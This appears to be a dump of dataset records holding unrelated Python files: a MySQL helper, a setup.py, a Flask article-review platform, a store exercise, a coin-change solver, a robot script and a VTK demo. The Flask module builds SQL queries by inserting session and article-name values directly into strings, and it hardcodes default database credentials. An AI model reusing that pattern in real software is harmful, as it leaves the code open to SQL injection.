False,ret\n\n\nclass DBOperation:\n\tdefault = \"default\"\n\tselect = \"select\"\n\tinsert = \"insert\"\n\n\n#@mo.time_calc\ndef db_exec(_sql, op=DBOperation.default):\n\t\tglobal g_conn\n\t\tstarttime = time.time()\n\t\tcount,rets = -1,None\n\t\tret = None\n\t\tis_w = (_sql.find(\"select \")!=0 or _sql.find(\"6s_trace\")!=0 or _sql.find(\"6s_wx_msg\")!=0)\n\t\tfor i in range(2):\n\t\t\t\t_cur = None\n\t\t\t\ttry:\n\t\t\t\t\t\t_cur = g_conn.cursor()\n\t\t\t\t\t\tcount=_cur.execute(_sql) \n\t\t\t\t\t\trets = _cur.fetchall()\n\t\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\t\trets = \"[sql error] retry.%d, %s, %s. [%s]\"%(i,str(sys.exc_info()),str(traceback.format_exc()),_sql )\n\t\t\t\t\t\tmo.logger.error( rets )\n\t\t\t\t\t\tdb_init()\n\t\t\t\tfinally:\n\t\t\t\t\t\tif _cur != None:\n\t\t\t\t\t\t\t\tret = _cur.lastrowid\n\t\t\t\t\t\t\t\t_cur.close()\n\t\t\t\t\t\t\t\tg_conn.commit()\n\t\t#mo.logger.info(\"[sql] %s %d %s. \"%(_sql,count,str(rets) ))\n\t\tendtime = time.time()\n\t\tif not \" 6s_trace\" in _sql and not \" 6s_wx_msg\" in _sql:\n\t\t\tif is_w:\n\t\t\t\tmo.logger.info(\"[sql_w] %s, count:%d, time:%.03f.\"%(_sql,count,float(endtime - starttime) ))\n\t\t\telse:\n\t\t\t\tmo.logger.info(\"[sql_r] %s, count:%d, time:%.03f.\"%(_sql,count,float(endtime - starttime) ))\n\t\tif op == DBOperation.insert:\n\t\t\treturn count,rets,ret\n\t\treturn count,rets\n\n\ndb_init()\n\n\n","repo_name":"linxuping/tools","sub_path":"python/aso_scrap/dbmgr.py","file_name":"dbmgr.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40388105756","text":"# -*- coding: utf-8 -*-\n\nimport pathlib\nfrom setuptools import setup\n\n\nROOT_DIR = pathlib.Path(__file__).parent\n\n\ndef get_version():\n about = {}\n ver_mod = ROOT_DIR / 'voicerecorder' / '_version.py'\n exec(ver_mod.read_text(), about)\n return about['__version__']\n\n\nsetup(\n name='VoiceRecorder',\n version=get_version(),\n packages=['voicerecorder'],\n url='',\n license='',\n author='Eugene Prilepin',\n author_email='',\n description='VoiceRecorder is a simple application for voice/audio record',\n install_requires=[\n 'PyQt5',\n 'tinydb',\n 'av',\n ],\n entry_points={\n 'gui_scripts': [\n 'voicerecorder = voicerecorder.__main__:main',\n ],\n 'console_scripts': [\n 'voicerecorder_console = voicerecorder.__main__:main',\n ],\n },\n)\n","repo_name":"espdev/VoiceRecorder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"28796745029","text":"import requests, psycopg2, cv2, datetime\nimport flask\n\nconn = psycopg2.connect(database=\"server_db\",\n user=\"postgres\",\n password=\"postgres\",\n host=\"localhost\",\n port=\"5432\")\n\ncursor = conn.cursor()\n\n#FOR SIGN IN AND SIGN UP\ndef stop_sessions():\n flask.session['user'] = None # session for user_id\n flask.session['fullname'] = None # session for user's fullname\n flask.session['role'] = None # session for user's roles\n flask.session['ban'] = None # session for user's ban status\n flask.session['article'] = None # session for name of latest openned article\n flask.session['article_id'] = None # session for id of latest openned article\n flask.session['title'] = None # session for title of latest oppend article\n return 0\n\ndef crypt_role(role):\n if role=='writer':\n role_id = 3\n elif role=='moderator':\n role_id = 2\n else:\n role_id = 5\n return role_id\n \ndef send_roles(records):\n roles = []\n for pair in records:\n roles.append(pair[1])\n return roles\n\ndef update_reviews(article_name, user_id, article_id, review, path):\n with open(path, \"r\") as file:\n lines = file.readlines()\n file.close()\n new_lines = []\n formed_id = str(user_id)\n for line in lines:\n wrong = 1\n for i in range(len(formed_id)):\n if line[i] == formed_id[i]:\n wrong = 0\n else:\n wrong = 1\n break\n if wrong == 0:\n new_lines += f\"{user_id}:{review}\\n\"\n else:\n new_lines += line\n text = form_article(new_lines)\n with open(path, \"w\") as file:\n file.write(text)\n file.close()\n return 0\n \n \n\n#CHECK\ndef authorization_check(validate_role, direction):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n elif user_roles[0] == 1 or user_roles[validate_role] == 1 or direction == 'home':\n #a - admin, m - moder, w - writer, r - reader;\n new_publish = f\"({check_writer_uploads()})\"\n return flask.render_template(f\"{direction}.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish)\n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_editors_check(article_id):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n else:\n user = flask.session.get('user')\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE user_id={user} and article_id={article_id}\")\n records = list(cursor.fetchall())\n if user_roles[0] == 1 or (user_roles[1] == 1 and records[0][2] == True):\n #a - admin, m - moder, w - writer, r - reader;\n new_publish = f\"({check_writer_uploads()})\"\n return flask.render_template(\"editors.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish)\n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_check_published(article_name):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n elif user_roles[0] == 1 or user_roles[1] == 1:\n #a - admin, m - moder, w - writer, r - reader;\n new_publish = f\"({check_writer_uploads()})\"\n cursor.execute(f\"SELECT * FROM public.article WHERE name='{article_name}' and isdeleted = {False}\")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, no_article=1)\n else:\n article_id = records[0][0]\n title = records[0][2]\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n path = f\".\\\\articles\\\\{article_name}.txt\"\n text = form_text(path)\n if check[0][1] == 2:\n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, text=text, title=title)\n elif check[0][1] == 3: \n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, text=text, title=title, aprooved=1)\n elif check[0][1] == 4:\n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, text=text, title=title, denied=1) \n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_check_draft(article):\n roles = flask.session.get('role')\n ban = flask.session.get('ban')\n if roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n elif roles[0] == 1 or roles[2] == 1:\n cursor.execute(f\"SELECT * FROM public.article WHERE name='{article}'\")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template('draft.html', no_article = 1)\n else:\n title = records[0][2]\n reason = records[0][3]\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={records[0][0]} and user_id={flask.session.get('user')}\")\n recs = list(cursor.fetchall())\n if recs == []:\n return flask.redirect(flask.url_for('.workshop'))\n author = is_author(records[0][0], flask.session.get('user'))\n path = f\".\\\\articles\\\\{article}.txt\"\n text = form_text(path)\n new_publish = f\"({check_writer_uploads()})\"\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id='{records[0][0]}'\")\n records = list(cursor.fetchall())\n if records[0][1] == 1:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author)\n elif records[0][1] == 2:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author, publish=1)\n elif records[0][1] == 3:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author, aprooved=1)\n else:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author, reason=reason, denied=1)\n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_check_article(article_name):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n else:\n new_publish = f\"({check_writer_uploads()})\"\n cursor.execute(f\"SELECT * FROM public.article WHERE name='{article_name}' and isdeleted = {False} \")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, no_article=1)\n else:\n user_id = flask.session.get('user')\n article_id = records[0][0]\n flask.session['article_id'] = article_id\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n status_id = check[0][1]\n #checking if article is aprooved.\n if status_id != 3:\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id} and user_id={user_id}\")\n check = list(cursor.fetchall())\n if check != []:\n return flask.redirect(flask.url_for('.draft_start'))\n else:\n if status_id == 1:\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, not_published=1)\n elif status_id == 2:\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, not_aprooved=1)\n else:\n desc = records[0][3]\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, denied=1, reason=desc)\n else:\n #here must be tags\n title = records[0][2]\n path = f\".\\\\articles\\\\{article_name}.txt\"\n text = form_text(path)\n topic = get_topic(article_id)\n rate = get_rating(article_id)\n user_review=review_check(user_id, article_id, article_name)\n cursor.execute(f\"UPDATE public.user_read SET isread={True} WHERE user_id={user_id} and article_id={article_id} and isread={False}\")\n conn.commit()\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, title=title, text=text, rate=rate, user_rate=user_review[0], user_review=user_review[1], user_date=user_review[2])\n #path = f\".\\\\reviews\\\\{article_name}.txt\"\n #reviews = form_text(path)\n \n \ndef check_writer_uploads():\n cursor.execute(f\"SELECT * FROM public.article_status WHERE status_id=2\")\n records = list(cursor.fetchall())\n res = 0\n for i in records:\n res+=1\n return res\n\ndef review_check(user_id, article_id, article_name):\n cursor.execute(f\"SELECT * FROM public.rating WHERE user_id={user_id} and article_id={article_id} and isdeleted={False}\")\n records = list(cursor.fetchall())\n rate = None\n review = None\n date = None\n if records != []:\n rate = records[0][4]\n date = records[0][3]\n path = f\".\\\\reviews\\\\{article_name}.txt\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n formed_id = str(user_id)\n for line in lines:\n wrong = 1\n for i in range(len(formed_id)):\n if line[i] == formed_id[i]:\n wrong = 0\n else:\n wrong = 1\n break\n if wrong == 0:\n review = line[len(formed_id)+1:]\n break\n return [rate, review, date]\n\ndef is_author(article_id, user_id):\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id='{article_id}' and user_id='{user_id}'\")\n records = list(cursor.fetchall())\n if records[0][2] == True:\n return 1\n else:\n return 0\n\n\"\"\"\ndef workshop_check(user_id, roles, no_article):\n new_publish = f\"({check_writer_uploads()})\"\n ban = flask.session.get('ban')\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE user_id={user_id}\")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template('workshop.html', a = roles[0], m = roles[1], w = roles[2], new_publish=new_publish)\n else:\n first, second, third = None, None, None\n for i in range (len(records)-1, -1, -1):\n article_id = records[i][0]\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n recs = list(cursor.fetchall())\n if recs != []:\n if i == len(records)-1:\n first = recs[0][1]\n elif i == len(records)-2:\n second = recs[0][1]\n elif i == len(records)-3:\n third = recs[0][1]\n else: \n break\n else:\n break\n return flask.render_template('workshop.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, no_article=no_article)\n\"\"\"\n\n\n#FORM\ndef form_text(path):\n check = 1\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n if path[2:10] == 'articles':\n return form_article(lines)\n #else:\n #return form_reviews(lines)\n\ndef form_article(lines):\n if lines == []:\n return None\n else:\n check = 1\n new_lines = \"\"\n for line in lines:\n if line != \"\\n\" or check == 1:\n new_lines += line\n check = 0\n else:\n check = 1\n #print(new_lines)\n return new_lines\n\ndef form_read_colums(article_id):\n cursor.execute(f\"SELECT * FROM public.users\")\n records = list(cursor.fetchall())\n for rec in records:\n cursor.execute(f\"INSERT INTO public.user_read (user_id, article_id, isread) VALUES ({rec[0]}, {article_id}, {False})\")\n conn.commit()\n return 0\n\n\"\"\"\ndef form_reviews(article_id):\n res = \"\"\n cursor.execute(f\"SELECT * FROM public.rating WHERE article_id={article_id} and isdeleted={False}\")\n rating = list(cursor.fetchall())\n if rating == []:\n return None\n else:\n for i in (len(rating)-1, 0, -1):\n cursor.execute(f\"SELECT * FROM public.users WHERE id={rating[i][1]} and isbanned={False}\")\n records = list(cursor.fetchall())\n username = records[0][1]\n fullname = records[0][3]\n\ndef build_html(direction):\n path = f\".\\\\templates\\\\{direction}.html\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n rem = 0\n res = \"\"\n for i in range (len(lines)):\n if rem == 0:\n res += lines[i]\n if lines[i] == \"\\t\\t\\t\\tvar myArray = [\\n\":\n rem = 1\n elif lines[i] == \"\\t\\t\\t\\t]\\n\":\n if direction == 'home':\n res += select_table_desc() + lines[i]\n else:\n res += select_table_published() + lines[i]\n rem = 0\n with open(path, \"w\") as file:\n file.write(res)\n file.close()\n return 0\n\"\"\"\n#GET\ndef get_topic(article_id):\n cursor.execute(f\"SELECT * FROM public.article_topic WHERE article_id={article_id}\")\n article_desc = list(cursor.fetchall())\n cursor.execute(f\"SELECT * FROM public.topic WHERE id={article_desc[0][1]}\")\n topic_desc = list(cursor.fetchall())\n topic = topic_desc[0][1]\n return topic\n\ndef get_rating(article_id):\n cursor.execute(f\"SELECT * FROM public.rating WHERE article_id={article_id} and isdeleted={False}\")\n rating_desc = list(cursor.fetchall())\n count = 0\n for log in rating_desc:\n count += log[4]\n if count!=0:\n reviews = round(count/len(rating_desc), 1)\n else:\n reviews = 0\n return reviews\n\ndef get_current_date():\n time = str(datetime.datetime.now())\n time = time[0:10]\n res = \"\"\n for char in time:\n if char != \"-\":\n res += char\n else:\n res += '.'\n return res\n\n\n#SELECT\ndef select_role(roles):\n res = [0, 0, 0, 0]\n for role in roles:\n if role == 1:\n res[0]=1\n elif role == 2:\n res[1]=1\n elif role == 3:\n res[2]=1\n elif role == 4:\n res[3]=1\n return res\n\ndef select_table_desc():\n cursor.execute(f\"SELECT * FROM public.article WHERE isdeleted={False}\")\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0]\n name = rec[1]\n date = rec[5]\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n if check[0][1] == 3:\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\")\n article_desc = list(cursor.fetchall())\n authors = \"\"\n for log in article_desc:\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id)\n reviews = get_rating(article_id)\n cursor.execute(f\"SELECT * FROM public.user_read WHERE article_id={article_id} and isread={True}\")\n views_check = list(cursor.fetchall())\n views = len(views_check)\n array += {'name':name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date},\n return array\n\ndef select_table_published():\n cursor.execute(f\"SELECT * FROM public.article_status WHERE status_id={2}\")\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0]\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n article_desc = list(cursor.fetchall())\n name = article_desc[0][1]\n date = article_desc[0][5]\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n authors = \"\"\n for log in check:\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id)\n reviews = '-'\n views = 0\n array += {'name': name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date},\n return array\n\ndef select_table_personal():\n user_id = flask.session.get('user')\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE user_id={user_id}\")\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0]\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n article_desc = list(cursor.fetchall())\n name = article_desc[0][1]\n date = article_desc[0][5]\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n authors = \"\"\n for log in check:\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id)\n reviews = get_rating(article_id)\n cursor.execute(f\"SELECT * FROM public.user_read WHERE article_id={article_id} and isread={True}\")\n views_check = list(cursor.fetchall())\n views = len(views_check)\n array += {'name': name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date},\n return array\n\ndef select_reviews():\n #author, username, rate, review, date\n user_id = flask.session.get('user')\n article_id = flask.session.get('article_id')\n array = []\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n records = list(cursor.fetchall())\n if records != []:\n article_name = records[0][1]\n path = f\".\\\\reviews\\\\{article_name}.txt\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n for line in lines:\n author_id = \"\"\n for i in range(len(line)):\n if line[i] == ':':\n start = i\n break\n else:\n author_id += line[i]\n if int(author_id) == int(user_id):\n continue\n else:\n review = line[start+1:]\n review = review[0:len(review)-2]\n cursor.execute(f\"SELECT * FROM public.users WHERE id={author_id}\")\n author_desc = list(cursor.fetchall())\n username = author_desc[0][1]\n author = author_desc[0][3]\n cursor.execute(f\"SELECT * FROM public.rating WHERE user_id={author_id} and article_id={article_id}\")\n rating_desc = list(cursor.fetchall())\n rate = rating_desc[0][4]\n date = rating_desc[0][3]\n array += {'author': author, 'username': username, 'rate': rate, 'comment': review, 'date': date},\n return array\n\n#for selecting articles aprooved recently\ndef select_table_recent():\n current_date = get_current_date() # get date\n user_id = flask.session.get('user') # get user id\n cursor.execute(f\"SELECT * FROM public.article WHERE isdeleted={False}\") # selecting all not deleted articles\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0] # get article id\n name = rec[1] # get article name\n date = rec[5] # get date of aprooving article\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\") # selecting articles's status\n check = list(cursor.fetchall())\n cursor.execute(f\"SELECT * FROM public.user_read WHERE user_id={user_id} and article_id={article_id}\") # checking which articles user has already read\n read_check = list(cursor.fetchall())\n if check[0][1] == 3 and (read_check[0][2] != True or rec[5] == current_date): # checking if article is aprooved, if user read current article or article was aprooved today \n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\") # selecting article's authors\n article_desc = list(cursor.fetchall())\n authors = \"\"\n for log in article_desc: # getting authors of article\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id) # getting article's topic\n reviews = get_rating(article_id) # getting article's rating \n cursor.execute(f\"SELECT * FROM public.user_read WHERE article_id={article_id} and isread={True}\")\n views_check = list(cursor.fetchall())\n views = len(views_check) # getting article's views\n array += {'name': name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date}, # form array\n return array\n \n\n\n\"\"\" \nTESTS\nif __name__ == '__main__':\n time = str(datetime.datetime.now())\n time = time[0:10]\n print(time)\n array = select_table_desc()\n print(array)\n conn = psycopg2.connect(database=\"server_db\",\n user=\"postgres\",\n password=\"postgres\",\n host=\"localhost\",\n port=\"5432\")\n cursor = conn.cursor()\n cursor.execute(f\"SELECT * FROM role_user WHERE user_id=4\")\n records = list(cursor.fetchall())\n for i in range(len(records)):\n print(records[i], i)\n\nif __name__ == '__main__':\n path = f\".\\\\articles\\\\test3.txt\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n print(lines)\n form_text(path)\n with open(\".\\\\reviews\\\\test2.txt\", \"w\") as file:\n file.write(\"\")\n file.close()\n with open(\".\\\\reviews\\\\test3.txt\", \"w\") as file:\n file.write(\"\")\n file.close()\n with open(\".\\\\reviews\\\\denis.txt\", \"w\") as file:\n file.write(\"\")\n file.close()\n path = f\".\\\\articles\\\\copy.txt\"\n with open(path, \"w\") as file:\n file.write(\"Your text goes here. And reads like this.\")\n text_file = open(path, \"r\")\n lines = text_file.readlines()\n print(lines[0])\n with open(\"copy.txt\", \"w\") as file:\n file.write(\"Your text goes here\")\n conn = psycopg2.connect(database=\"server_db\",\n user=\"postgres\",\n password=\"postgres\",\n host=\"localhost\",\n port=\"5432\")\n cursor = conn.cursor()\n cursor.execute(f\"SELECT * FROM role_user WHERE user_id=4\")\n records = list(cursor.fetchall())\n\"\"\"\n \n \n\n ","repo_name":"EKhudoborodov/Platform-server","sub_path":"functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":24892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32099298554","text":"\"\"\"\nCreate a store module that will allow a store owner\nto MANAGE the store and a consumer to BUY\n\n\"\"\"\nimport os.path\nimport sys\nclass Product:\n base_dir = \"data\"\n\n def __init__(self, barcode, name, price):\n self.name = name\n self.price = price\n self.barcode = barcode\n self.check_dir()\n self.write()\n\n @property\n def name(self):\n return self.__name\n @property\n def price(self):\n return self.__price\n @property\n def barcode(self):\n return self.__barcode\n @name.setter\n def name(self, name):\n self.__name = name\n @price.setter\n def price(self, price):\n self.__price = price\n @barcode.setter\n def barcode(self, barcode):\n self.__barcode = barcode\n\n def check_dir(self):\n if not os.path.exists(self.base_dir):\n os.mkdir(self.base_dir)\n\n def write(self):\n f = open(self.base_dir + \"/\" + self.barcode + \".txt\", \"w\")\n f.write(f\"{self.name}\\n{self.price}\")\n f.close()\n @staticmethod\n def does_exist(barcode):\n return os.path.exists(Product.base_dir + \"/\" + barcode + \".txt\")\n\n @classmethod\n def get_product_by_barcode(cls, barcode):\n f = open(Product.base_dir + \"/\" + barcode + \".txt\", \"r\")\n contents = f.readlines()\n\n return cls(barcode=barcode, name=contents[0].strip(),\n price=float(contents[1].strip()))\n\ndef manage():\n \"\"\"\n Ask the store owner for: barcode, name, price\n ADD this product to a directory: many .txt files\n barcode.txt, where barcode = numbers\n \"\"\"\n while True:\n try:\n barcode = input(\"Enter barcode: \")\n name = input(\"Enter name: \")\n price = float(input(\"Enter price: \"))\n p = Product(name=name, price=price,\n barcode=barcode)\n answer = input(\"Do you want to add another product? y/n: \")\n if answer[0].lower() != \"y\":\n break\n except ValueError:\n print(\"Invalid Price\", file=sys.stderr)\n\n main()\ndef buy():\n summary = list()\n print(\"Welcome to our shopping center\")\n while True:\n answer = input(\"Enter barcode or (Q)uit to stop shopping\")\n if answer[0].lower() == \"q\":\n break\n if not Product.does_exist(answer):\n print(f\"Barcode {answer} does not exist\")\n else:\n p = Product.get_product_by_barcode(answer)\n summary.append(p)\n print(f\"You have added {p.name} to cart with price of {p.price}\")\n\n print(f\"Summary of items = Total Items {len(summary)}, Total Price \"\n f\"= { sum( [ item.price for item in summary ] ) }\")\n\n main()\ndef main():\n print(\"Welcome to our store\")\n choice = input(\"Do you want to MANAGE or BUY?: \")\n if choice[0].lower() == \"m\":\n manage()\n elif choice[0].lower() == \"b\":\n buy()\n else:\n print(\"Invalid option\", file=sys.stderr)\nif __name__ == '__main__':\n main()\n","repo_name":"ProfBlanc/comp2155Fall2023","sub_path":"wk3/friday-12pm/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13166492046","text":"import os\n\nclass Package:\n def __init__(self, dpath):\n self.dpath = dpath\n \n def checkSql(self):\n print(\"这逼玩意儿胎神\")\n \n def checkCfg(self):\n print(\"是那个胎神嘛\")\n \n def checkFileNames(self):\n print(\"就是那个卅\")\n \n def PackCodes(self):\n print(\"二傻子\")\n \n def QuitOut(self):\n print(\"你给我滚吧!!\")\n return -1\n \n def main(self):\n print(\"###########################################################################\")\n print(\"##########输入要执行的操作: \")\n print(\"##########输入1:检查sql文件是否满足提版要求\")\n print(\"##########输入2:检查配置文件\")\n print(\"##########输入3:检查脚本命名是否规范\")\n print(\"##########输入4:代码打包\")\n print(\"##########输入e:退出程序\")\n print(\"###########################################################################\")\n while True:\n flag = input(\">>>>>>:\")\n print(\"Ready Go!~~\")\n if flag == \"1\":\n self.checkSql()\n elif flag == \"2\":\n self.checkCfg()\n elif flag == \"3\":\n self.checkFileNames()\n elif flag == \"4\":\n self.PackCodes()\n elif flag == \"e\":\n answerBox = input(\">>>>>是否确认退出:Y/N\")\n if answerBox == \"y\" or answerBox.upper() == \"Y\":\n ret = self.QuitOut()\n if ret == -1:\n break\n else:\n self.main()\n else:\n print(\"你他妈的都输入的啥子???~~~\")\nif __name__ == '__main__':\n dpath = \"123\"\n pack = Package(dpath)\n pack.main()","repo_name":"huangchao20/Jenkins_05","sub_path":"MyTools/随笔.py","file_name":"随笔.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7800560841","text":"def combinations(amount, coins: list):\n result = []\n\n def dfs(amount, coins, i, path, result):\n\n if i >= len(coins):\n return\n\n if amount < 0: # invalid base\n return\n\n if amount == 0: # valid case\n result.append([a for a in path])\n return\n\n # general case\n # call left child\n path.append(coins[i])\n dfs(amount-coins[i], coins, i, path, result)\n path.pop()\n\n # call right child\n dfs(amount, coins, i+1, path, result)\n\n dfs(amount, coins, 0, [], result)\n print(result)\n# return min(result)\n\n\ncombinations(20, [5, 10, 20])\n\n\ndef shorestCombination(amount, coins: list):\n\n def dfs(amount, coins, i, length) -> int:\n\n if i >= len(coins):\n return 10000\n\n if amount < 0: # invalid base\n return 10000\n\n if amount == 0: # valid case\n return length\n\n # general case\n # call left child\n length += 1\n left = dfs(amount-coins[i], coins, i, length)\n length -= 1\n\n # call right child\n right = dfs(amount, coins, i+1, length)\n\n return min(left, right)\n\n return dfs(amount, coins, 0, 0)\n\n\nprint(shorestCombination(20, [5, 10, 20]))\n\n# Time Complexity: O(2^n) where n is the number of input (coins)\n# Space Complexity: O(h) where h (amount) is the height of the tree\n","repo_name":"elemaryo/Leetcode-problems","sub_path":"coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32180953324","text":"#Alexandre Carle et Louis-philippe Rousseau\n#15 septembre 2022\n#Dernier changement le 22 septembre 2022\n\nimport time\nfrom robot import Robot\nfrom Odomètre import Odomètre\n\nrobot = Robot()\nodomètre = Odomètre()\n\nodomètre.avancer_distance(100)\nrobot.Avancer()\nodomètre.attendre()\nrobot.Freiner()\ntime.sleep(1)\n \n","repo_name":"Alex6X9X/Conception_Enviro","sub_path":"Laboratoire_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9040241869","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Image pipeline\nreader = vtk.vtkPNGReader()\nreader.SetFileName(\"\" + str(VTK_DATA_ROOT) + \"/Data/fullhead15.png\")\nsmooth = vtk.vtkImageGaussianSmooth()\nsmooth.SetDimensionality(2)\nsmooth.SetStandardDeviations(1,1)\nsmooth.SetInputConnection(reader.GetOutputPort())\nimageAppend = vtk.vtkImageAppendComponents()\nimageAppend.AddInputConnection(reader.GetOutputPort())\nimageAppend.AddInputConnection(smooth.GetOutputPort())\nclip = vtk.vtkImageClip()\nclip.SetInputConnection(imageAppend.GetOutputPort())\nclip.SetOutputWholeExtent(0,255,0,255,20,22)\naccum = vtk.vtkImageAccumulate()\naccum.SetInputConnection(clip.GetOutputPort())\naccum.SetComponentExtent(0,255,0,255,0,0)\naccum.SetComponentSpacing(12,12,0.0)\nviewer = vtk.vtkImageViewer()\nviewer.SetInputConnection(accum.GetOutputPort())\nviewer.SetColorWindow(4)\nviewer.SetColorLevel(2)\nviewer.Render()\n# --- end of script 